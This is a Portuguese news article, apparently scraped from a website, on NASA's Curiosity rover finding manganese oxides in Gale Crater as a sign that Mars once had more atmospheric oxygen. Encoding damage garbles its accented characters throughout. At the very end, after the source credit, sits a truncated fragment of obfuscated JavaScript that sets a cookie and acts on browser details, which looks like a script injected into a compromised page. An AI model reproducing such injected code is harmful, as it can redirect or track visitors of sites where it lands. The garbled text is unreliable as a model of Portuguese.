Como se jA? nA?o fosse o suficiente a enxurrada de descobertas apresentadas sobre Marte no ano passado, a NASA agora vem com mais uma notA�cia incrA�vel: o rover Curiosity encontrou altos nA�veis de A?xidos de manganA?s em rochas, o que sinaliza que a atmosfera marciana jA? teve oxigA?nio (O2) em abundA?ncia.

Os A?xidos de manganA?s foram encontrados em veias minerais. Muito provavelmente, o nA�vel de oxigA?nio mais elevado pode estar ligado a um momento em que as A?guas subterrA?neas estavam presentes na A?rea em que o rover estA? atualmente, o Gale Crater.

a�?As A?nicas formas na Terra que sabemos que fazem esses materiais com manganA?s envolvem oxigA?nio atmosfA�rico ou [gerado por] micrA?biosa�?, diz Nina Lanza, cientista planetA?ria em Los Alamos Laboratory, no Novo MA�xico. a�?Agora, estamos vendo A?xidos de manganA?s em Marte, e nA?s estamos querendo saber como diabos eles poderiam ter se formadoa�?.

Ponderar que o A?xido de manganA?s tenha se formado por oxigA?nio gerado por micrA?bios A� um grande exagero no momento, entA?o, ponderar que a atmosfera de Marte jA? teve mais oxigA?nio em seu passado A� a postulaA�A?o mais sensata. a�?Estes materiais com taxas de manganA?s elevados nA?o podem se formar sem uma determinada quantidade de A?gua lA�quida e condiA�A�es fortemente oxidantes. Aqui na Terra temos muita A?gua mas nA?o tivemos nenhum depA?sito generalizado de A?xido de manganA?s atA� depois dos nA�veis de oxigA?nio aumentarem na atmosferaa�?.

a�?Uma forma em potencial para explicar o inA�cio do oxigA?nio na atmosfera de Marte A� a partir da quebra de molA�culas quando o planeta Marte estava perdendo seu campo magnA�ticoa�?, explica Lanza. a�?Pensamos que, nesse momento da histA?ria de Marte, a A?gua era muito mais abundantea�?.

Por conta da falta de um magnetismo que funcionasse bem, a radiaA�A?o ionizante comeA�ou a dividir as molA�culas de A?gua em hidrogA?nio e oxigA?nio. A baixa gravidade de Marte fez com que o planeta nA?o conseguisse segurar os A?tomos leves de hidrogA?nio, mas os de oxigA?nios, mais pesados, ficaram para trA?s.A� a�?A� difA�cil confirmar se este cenA?rio de oxigA?nio atmosfA�rico de Marte realmente aconteceu. Mas A� importante notar que esta ideia representa um desvio em nossa compreensA?o de como atmosferas planetA?rias podem tornar-se oxigenadoa�?, completa a cientista.

Via site da NASA

d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}